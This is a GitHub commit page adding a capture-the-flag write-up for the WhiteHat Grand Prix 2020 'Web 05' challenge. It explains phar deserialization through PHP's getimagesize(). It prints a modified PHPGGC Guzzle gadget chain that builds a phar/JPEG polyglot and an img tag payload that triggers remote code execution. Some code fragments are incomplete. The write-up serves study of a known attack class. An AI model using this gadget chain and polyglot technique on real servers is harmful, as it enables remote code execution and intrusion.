Skip to content
Browse files


  • Loading branch information
owodelta committed Jan 10, 2020
1 parent bdc2d44 commit b0a9c0f7320b02236df9e0f02be7f7c5034800e5
Showing with 62 additions and 0 deletions.
  1. +62 −0 2020/whitehat-grandprix-2020/web05/
@@ -0,0 +1,62 @@
# Web 05
The challenge has source code (luckily).

We can trigger deserialization because of following vulnerable code:
try {
if ($imageInfo['Height'] && $imageInfo['Width']) {
$height = $imageInfo['Height'];
$width = $imageInfo['Width'];
} else {
list($width, $height) = getimagesize($image);
`getimagesize()` accepts attacker controllable URI. If we pass `phar://` scheme it would trigger phar deserialization.

One more thing we need to care of is our phar archive must be a valid image (or at least look like it). There's a known solution for this problem.

The server uses `http guzzle` that again, fortunately for us, has needed gadget achieve RCE on the server.
The `php-ggc` framework contains a generator code that is changed so that it would generate phar/image polyglot.

The modified code is shown below:
namespace GadgetChain\Guzzle;
class FW1 extends \PHPGGC\GadgetChain\FileWrite
public static $version = '6.0.0 <= 6.3.3+';
public static $vector = '__destruct';
public static $author = 'cf';
public function generate(array $parameters)
$path = $parameters['remote_path'];
$data = $parameters['data'];
$a = new \GuzzleHttp\Cookie\FileCookieJar($path, $data);
$p = new \Phar('pwn.phar', 0);
$p['file.txt'] = 'test';
$p->setStub("\xff\xd8\xff\xe0\x0a<?php __HALT_COMPILER(); ?>");

We upload this "image" to server and record the path.
Then we generate html page that would point to it.
pwn image here
<img src=phar:///app/upload/af55k6peln8ni9270eut7i8uqr/73f2a4aa40cf38e647d802bc.jpg>
Then we fetch image from our server and get RCE.

## Flag

0 comments on commit b0a9c0f

Please sign in to comment.
You can’t perform that action at this time.